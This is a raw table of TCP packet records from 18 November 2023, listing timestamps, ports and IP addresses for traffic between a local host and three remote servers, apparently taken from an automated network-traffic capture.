Nov 18, 2023 10:02:35.937493086 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.937510967 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.937517881 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.937527895 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.937537909 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.937545061 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.937561989 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.937573910 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.937578917 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.937597036 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.937609911 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.937616110 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.937633991 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.937650919 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.937654972 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.937668085 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.937681913 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.937683105 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.937700033 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.937716961 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.937719107 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.937735081 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.937743902 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.937752008 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.937768936 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.937784910 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.937792063 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.937802076 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.937820911 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.937829971 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.937838078 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.937849045 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.937855005 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.937870979 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.937889099 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.937897921 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.937905073 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.937921047 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.937936068 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.937937021 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.937953949 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.937957048 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.937969923 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.937987089 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.938000917 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.938003063 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.938021898 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.938038111 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.938039064 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.938055992 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.938059092 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.938071966 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.938091040 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.938097000 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.938107014 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.938122988 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.938134909 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.938138962 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.938154936 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.938154936 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.938170910 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.938186884 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.938201904 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.938205004 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.938220978 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.938230038 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.938236952 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.938251019 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.938254118 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.938270092 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.938287020 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.938287020 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.938303947 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.938321114 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.938328981 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.938337088 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.938350916 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.938353062 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.938370943 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.938386917 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.938388109 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.938401937 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.938419104 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.938425064 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.938435078 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.938452005 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.938462973 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.938467979 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.938486099 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.938494921 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.938503027 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.938519955 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.938534975 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.938538074 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.938555956 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.938558102 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.938574076 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.938591003 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.938599110 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.938607931 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.938626051 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.938643932 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.938643932 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.938661098 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.938664913 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.938678026 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.938694954 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.938703060 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.938714027 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.938730955 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.938739061 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.938747883 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.938760996 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.938765049 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.938783884 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.938796997 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.938800097 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.938817978 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.938832045 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.938834906 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.938851118 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.938868046 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.938880920 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.938884974 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.938901901 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.938915014 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.938918114 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.938936949 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.938939095 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.938955069 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.938972950 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.938973904 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.938990116 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.939007044 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.939008951 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.939024925 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.939033031 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.939043045 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.939100981 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.991401911 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.012516975 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.013451099 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.051728010 CET	443	49745	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:36.051840067 CET	443	49745	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:36.051891088 CET	443	49745	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:36.051932096 CET	443	49745	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:36.051930904 CET	49745	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:36.051954031 CET	443	49745	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:36.051990032 CET	49745	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:36.052025080 CET	443	49745	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:36.052073002 CET	49745	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:36.052081108 CET	443	49745	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:36.052835941 CET	443	49745	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:36.052895069 CET	49745	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:36.052902937 CET	443	49745	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:36.052947998 CET	49745	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:36.053689957 CET	443	49745	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:36.053703070 CET	443	49745	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:36.053759098 CET	49745	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:36.054517031 CET	443	49745	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:36.054596901 CET	49745	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:36.055491924 CET	443	49745	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:36.055569887 CET	49745	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:36.055598974 CET	443	49745	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:36.055658102 CET	49745	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:36.056302071 CET	443	49745	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:36.056364059 CET	49745	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:36.057183981 CET	443	49745	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:36.057252884 CET	49745	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:36.058028936 CET	443	49745	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:36.058094025 CET	49745	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:36.058135033 CET	443	49745	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:36.058191061 CET	49745	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:36.058845043 CET	443	49745	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:36.058916092 CET	49745	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:36.059798956 CET	443	49745	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:36.059870005 CET	49745	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:36.060620070 CET	443	49745	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:36.060709000 CET	49745	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:36.109713078 CET	42691	49738	194.169.175.235	192.168.2.4
Nov 18, 2023 10:02:36.148848057 CET	49738	42691	192.168.2.4	194.169.175.235
Nov 18, 2023 10:02:36.228276014 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.228322029 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.228338003 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.228362083 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.228379965 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.228396893 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.228413105 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.228429079 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.228446960 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.228463888 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.228481054 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.228483915 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.228483915 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.228483915 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.228497982 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.228523970 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.228523970 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.228558064 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.228647947 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.228666067 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.228717089 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.228857040 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.228874922 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.228892088 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.228909016 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.228929996 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.228965044 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.229115009 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.229131937 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.229150057 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.229168892 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.229183912 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.229197979 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.229217052 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.229228020 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.229233980 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.229269981 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.229274988 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.229321957 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.229368925 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.229387045 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.229403973 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.229422092 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.229437113 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.229479074 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.229504108 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.229523897 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.229572058 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.229607105 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.229643106 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.229660034 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.229676962 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.229712009 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.229742050 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.229765892 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.229783058 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.229799986 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.229815960 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.229832888 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.229834080 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.229850054 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.229872942 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.229892969 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.229897976 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.229918003 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.229934931 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.229967117 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.229979038 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.229996920 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.230014086 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.230030060 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.230031013 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.230047941 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.230063915 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.230070114 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.230081081 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.230093002 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.230098963 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.230128050 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.230391026 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.230407953 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.230424881 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.230443001 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.230463982 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.230479956 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.230480909 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.230499029 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.230534077 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.230720997 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.230736971 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.230753899 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.230768919 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.230782986 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.230786085 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.230802059 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.230818987 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.230824947 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.230834961 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.230844975 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.230853081 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.230864048 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.230870962 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.230890036 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.230905056 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.230907917 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.230925083 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.230942011 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.230946064 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.230998039 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.231405020 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.231933117 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.231983900 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.231991053 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.237116098 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.237134933 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.237190962 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.237212896 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.237256050 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.237266064 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.237272978 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.237306118 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.237319946 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.237322092 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.237339020 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.237354994 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.237373114 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.237380028 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.237390041 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.237407923 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.237415075 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.237425089 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.237435102 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.237442017 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.237458944 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.237476110 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.237492085 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.237492085 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.237509966 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.237524986 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.237528086 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.237544060 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.237549067 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.237586021 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.237617016 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.237637043 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.237654924 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.237672091 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.237673044 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.237690926 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.237708092 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.237708092 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.237725019 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.237737894 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.237741947 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.237761974 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.237773895 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.237778902 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.237809896 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.237891912 CET	80	49744	194.49.94.120	192.168.2.4
